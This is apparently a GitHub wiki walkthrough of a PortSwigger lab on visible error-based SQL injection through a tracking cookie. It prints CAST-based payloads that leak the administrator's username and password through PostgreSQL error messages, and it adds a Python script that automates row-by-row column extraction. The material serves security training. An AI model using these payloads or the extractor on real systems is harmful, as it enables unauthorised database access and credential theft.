Visible error‐based SQL injection - KA4KA4/PortSwigger-SQL-injection-Labs GitHub Wiki

hello

Today we are going to talk about another type of SQL injection vulnerability: visible error-based SQL injection, where the database's own error messages are shown to the user and can be abused to leak data.

Lab description: the application uses a tracking cookie for analytics and performs a SQL query containing the value of the submitted cookie. The results of the SQL query are not returned to the user.

So let's start the lab.

Access the lab, intercept a request in Burp Proxy and send it to Repeater. The parameter we are interested in is the tracking cookie (TrackingId in this lab).

Now we try to make the application throw an error. In real-life testing we test every parameter of the application, because any of them may be vulnerable, and not only to SQL injection.

When we send the regular request without adding any quotation mark:

we get a normal response. Now we need to break the SQL syntax to check for an error, because a database error indicates that our input reaches the query unsanitised. Append a single quote (`'`) to the cookie value:

Now we get an error. This error indicates that the application may be vulnerable to SQL injection.

  • note: the error disappears when we append two single quotes (`''`) instead of one. Inside a string literal `''` is an escaped single quote, so the string stays terminated and the query remains valid. Together these two results show that our input lands inside a quoted string.

And what happens when we delete one quote and add a comment sequence, i.e. append `'--`?

We no longer receive an error. The single quote closes the string literal and `--` comments out the rest of the original query, so the statement is valid again. This confirms the injection.



After this testing we know that our injection starts with `'` and can be ended with `--`, so we can write our own query between them (`' ... --`).

We can extract data via the visible error messages: if our malicious query makes the database convert a string to an integer, the error message includes the value it failed to convert, which leaks the data returned by our subquery.

Now use this query:

' AND CAST((SELECT password from users limit 1) AS int)--

  • explain: first break the query with a single quote, then use CAST on a subquery that selects a password from the users table. LIMIT 1 restricts the subquery to one row, which is required because a subquery used as a value must return a single row (and is useful wherever a query would otherwise return many rows). AS int tells the database to convert the password value to an integer. Finish with `--` to comment out the rest of the original query.

  • Error (ERROR: argument of AND must be type boolean, not type integer) tells us that the operand of AND must be a Boolean. What does that mean?

  • A Boolean expression is an expression that evaluates to true or false. It is built from Boolean operators such as AND, OR and NOT and relational operators such as equals (=), less than (<) and greater than (>). Our CAST(...) produces an integer, not a Boolean, so the database rejects `AND <integer>`.



  • After seeing that error, the next step is to turn the expression into a Boolean. We do this with a comparison operator: adding `1=` in front of the CAST makes the whole expression `1 = <integer>`, which is a Boolean, and lets us test whether the manipulated SQL statement is valid. The query is as follows:

' AND 1=CAST((SELECT 1) AS int)--

  • Explain: first break the query with `'`, then add a Boolean condition with AND. `1=CAST(...)` compares 1 with the value converted to an integer and is there to test that the statement is valid. `SELECT 1` is a placeholder: our real request to the database goes inside those parentheses, and we will change it later. AS int tells the database that the value returned by the CAST is an integer.

  • Now send the query and see what happens:

The error disappears.



After detecting a valid query, the next step is to extract the username column from the users table. It's the same query as before; we only change what is between the brackets:

' AND 1=CAST((SELECT username FROM users) AS int)--

  • We get another error, this time saying that the subquery returned more than one row.

This error occurs because the subquery returns every username, while a subquery used as a value may return only one row. We use LIMIT 1 to return only the first row. The query is as follows:

' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--

This time the error says the string literal is unterminated: the cookie value is limited in length, and the original tracking ID plus our payload is too long, so the end of the payload (including the `--`) is cut off before it reaches the database. Delete the original tracking ID value and keep only the payload; maybe the backend does not check whether the tracking ID actually exists. Send the request as follows:

As we expected, the backend sends the query to the database without checking the tracking ID. The error now complains that it cannot convert a string to an integer and includes that string: the username is administrator.


Now change what is between the brackets, replacing username with password, to get the password of the administrator user. The query is as follows:

' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--

Now we have the password of the administrator user. Log in to solve the lab.
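The whole procedure above, from classifying the error message to walking the leaked values, as an added Python example. It is not code from the original write-up or from PortSwigger; it assumes PostgreSQL error texts (the quoted patterns are the messages this lab returns), an assumed cookie length limit of 100 characters, a hypothetical `send` callable that an HTTP client would supply, and a constructed `fake_send` stand-in so that it runs offline. It also goes beyond the lab's LIMIT 1 by using OFFSET to walk further rows of the table.

```python
import re
from typing import Callable, Optional

# Assumed limit on the cookie value; the lab truncates longer values, which is why
# the original tracking ID must be dropped before the payload is appended.
MAX_COOKIE_LEN = 100

# PostgreSQL error texts met during the lab, checked in this order. The "leak"
# pattern captures the value the database failed to convert to an integer.
ERROR_PATTERNS = [
    ("leak", re.compile(r'invalid input syntax for type integer: "([^"]*)"')),
    ("not_boolean", re.compile(r"argument of AND must be type boolean")),
    ("multi_row", re.compile(r"more than one row returned by a subquery")),
    ("truncated", re.compile(r"Unterminated string literal")),
    ("syntax", re.compile(r"unterminated quoted string|syntax error at")),
]


def classify_error(body: str) -> tuple[str, Optional[str]]:
    """Map a response body to one of the error classes; for a leak, return the value too."""
    for kind, pattern in ERROR_PATTERNS:
        match = pattern.search(body)
        if match:
            return kind, (match.group(1) if match.groups() else None)
    return "none", None


def cast_payload(column: str, table: str, row: int = 0) -> str:
    """Boolean-wrapped CAST of a one-row subquery. OFFSET selects rows beyond the
    first (PostgreSQL syntax; the lab itself only needs LIMIT 1)."""
    return f"' AND 1=CAST((SELECT {column} FROM {table} LIMIT 1 OFFSET {row}) AS int)--"


def build_cookie(payload: str, original_id: str = "") -> str:
    """Cookie value to send. Keeping original_id is what produced the
    'Unterminated string literal' error in the write-up, so refuse that case."""
    value = original_id + payload
    if len(value) > MAX_COOKIE_LEN:
        raise ValueError(
            f"cookie value would be truncated at {MAX_COOKIE_LEN} characters; "
            "drop the original tracking ID"
        )
    return value


def extract_column(send: Callable[[str], str], column: str, table: str,
                   max_rows: int = 10) -> list[str]:
    """Leak a column one row at a time. An OFFSET past the last row makes the
    scalar subquery NULL, CAST(NULL AS int) is NULL, and no error is raised."""
    values: list[str] = []
    for row in range(max_rows):
        body = send(build_cookie(cast_payload(column, table, row)))
        kind, value = classify_error(body)
        if kind != "leak" or value is None:
            break
        values.append(value)
    return values


# Constructed stand-in for the lab backend (not the real application): a tiny
# users table and the PostgreSQL messages the real backend returned.
FAKE_USERS = [("administrator", "s3cr3t-pass"), ("wiener", "peter")]


def fake_send(cookie: str) -> str:
    """Pretend to run SELECT * FROM tracking WHERE id = '<cookie>' on PostgreSQL."""
    if len(cookie) > MAX_COOKIE_LEN:
        return "Unterminated string literal started at position 95 in SQL ..."
    match = re.search(r"SELECT (username|password) FROM users LIMIT 1 OFFSET (\d+)", cookie)
    if match is None:
        return "<html>normal page</html>"
    column, offset = match.group(1), int(match.group(2))
    if offset >= len(FAKE_USERS):
        return "<html>normal page</html>"  # empty subquery: NULL, no error
    value = FAKE_USERS[offset][0 if column == "username" else 1]
    return f'ERROR: invalid input syntax for type integer: "{value}"'


if __name__ == "__main__":
    print(extract_column(fake_send, "username", "users"))
    print(extract_column(fake_send, "password", "users"))
```

Against the real lab, replace `fake_send` with a function that sets the TrackingId cookie on a GET request and returns the response body. `build_cookie` encodes the lesson from the truncation step: it refuses to prepend the original tracking ID when the result would be cut off, and `classify_error` tells you which of the lab's errors you are looking at so you know whether to add LIMIT 1, wrap the CAST in a comparison, or read off the leaked value.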

thank you 🥇